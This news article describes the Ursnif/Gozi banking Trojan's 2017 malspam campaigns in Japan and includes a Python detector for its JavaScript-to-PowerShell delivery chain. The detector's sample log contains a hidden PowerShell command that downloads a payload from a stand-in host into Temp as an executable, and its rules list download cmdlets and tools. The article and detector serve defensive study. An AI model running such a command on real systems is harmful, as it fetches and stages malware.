Ursnif Banking Trojan Targeted Japan


As confirmed by IBM X-Force data on the financial malware used by cybercrime groups, the banking Trojan Ursnif, also known as Gozi, was a highly active malware code in the financial sector in 2016. In 2017 the Trojan has maintained its lead.


Ursnif activity is marked by campaigns and frequent code changes in Europe, Australia, and America. One of its prominent targets in 2017, however, has been Japanese banks: Ursnif's operators were highly active there in late Q3 2017, starting in September, and the threat actors continued to spam users in the region regularly as the year moved into Q4.


Japan, along with Australia, Europe, and America, has been targeted by Ursnif or Gozi for many years. But according to the report published by IBM X-Force analyzing the malware, the attackers have stepped up Ursnif campaigns in Japan, adding new evasion methods and new targets.


The current samples indicate that the criminal groups are targeting not just banks but also credentials for other services. As Limor Kessem, IBM's executive security advisor and the report's author, put it, "Besides banks, the variant of active Ursnif in Japan is targeting the credentials of users for cloud storage, local webmail, e-commerce sites, and cryptocurrency exchange platforms," as posted on 26th October 2017 on threatpost.com.


In its current campaigns in Japan, Ursnif has been delivered through malspam: emails carrying fake attachments that purport to come from Japanese financial services and payment card providers. Another malspam variant delivers an HTML link that triggers the download of a .zip file containing a JavaScript file. The script launches PowerShell, which fetches the Ursnif payload.
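The delivery chain just described (zip attachment, JavaScript inside it, PowerShell launched from the script to fetch the payload) leaves a recognizable trail in process-creation telemetry. The following Python script is an added example written for this page, not code from SPAMfighter or IBM X-Force: it runs a few simple detection rules over constructed, Sysmon-style process-creation events (the JSON field names, PIDs, paths and the `example.invalid` URL are all assumptions made for the example, not indicators from the report).

```python
"""Flag process-creation events that match a zip -> .js -> PowerShell download chain.

The sample events below are constructed for this example; they are not a real
capture. Field names (Image, ParentImage, CommandLine, ProcessId) follow the
Sysmon event-1 layout, which is an assumption about the telemetry source.
"""
import json
import re
from dataclasses import dataclass

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# PowerShell constructs commonly used to pull a second stage from the network.
DOWNLOAD_PATTERNS = [
    re.compile(r"downloadfile|downloadstring", re.I),
    re.compile(r"invoke-webrequest|\biwr\b|\bwget\b|\bcurl\b", re.I),
    re.compile(r"start-bitstransfer", re.I),
]
# -e / -ec / -enc / -EncodedCommand hides the script body from plain-text review.
ENCODED_FLAG = re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\b", re.I)
# A script host running .js/.jse/.vbs/.wsf from a Temp directory, which is where
# Explorer unpacks an opened zip attachment.
SCRIPT_FROM_TEMP = re.compile(r"\\temp\\.*\.(js|jse|vbs|wsf)\b", re.I)


@dataclass
class Finding:
    pid: int
    image: str
    parent_image: str
    reasons: list


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(event: dict) -> list:
    """Return the list of rule names an event matches (empty if benign)."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    reasons = []
    if parent in SCRIPT_HOSTS and image in POWERSHELL:
        reasons.append("powershell spawned by script host")
    if image in POWERSHELL and any(p.search(cmd) for p in DOWNLOAD_PATTERNS):
        reasons.append("powershell download cmdlet")
    if image in POWERSHELL and ENCODED_FLAG.search(cmd):
        reasons.append("encoded command")
    if image in SCRIPT_HOSTS and SCRIPT_FROM_TEMP.search(cmd):
        reasons.append("script host executing script from temp directory")
    return reasons


def scan(lines) -> list:
    """Parse one JSON event per line and collect findings in input order."""
    findings = []
    for line in lines:
        event = json.loads(line)
        reasons = classify(event)
        if reasons:
            findings.append(Finding(int(event["ProcessId"]), basename(event["Image"]),
                                    basename(event["ParentImage"]), reasons))
    return findings


# Constructed sample events: one benign mail client launch, the zip-extracted
# .js being run, PowerShell spawned by it to download a payload, and a benign
# interactive PowerShell session.
SAMPLE_EVENTS = [
    {"ProcessId": 3300, "Image": r"C:\Program Files\Microsoft Office\OUTLOOK.EXE",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "OUTLOOK.EXE"},
    {"ProcessId": 4120, "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" "C:\Users\alice\AppData\Local\Temp\Temp1_invoice.zip\invoice.js"'},
    {"ProcessId": 4188, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"powershell.exe -nop -w hidden -c (New-Object Net.WebClient).DownloadFile('http://example.invalid/p.bin','C:\Users\alice\AppData\Local\Temp\p.exe')"},
    {"ProcessId": 4400, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell.exe -Command Get-ChildItem C:\Users\alice\Documents"},
]
SAMPLE_LOG = [json.dumps(e) for e in SAMPLE_EVENTS]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"pid={f.pid} {f.parent_image} -> {f.image}: {', '.join(f.reasons)}")
```

The rules are deliberately narrow: a script host spawning PowerShell, or PowerShell invoking a download primitive, is rare in ordinary office use, so each rule on its own is already worth an alert, and an event matching two of them (the third sample above) deserves priority triage.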


Ursnif has used other evasion methods as well, including the Tor network to hide its command-and-control communications. In July, Forcepoint detected another anti-sandboxing technique used by Ursnif: it checked mouse movements to tell whether it was running in a research environment. If a sandbox was identified, the booby-trapped attachments delivered no payload.


As IBM X-Force notes, Ursnif has been one of the most active and powerful banking Trojans in Japan over the past five years. Our researchers have also been tracking the third version of Ursnif, which targets banks in Australia. Stay tuned for more information.

» SPAMfighter News - 02-11-2017

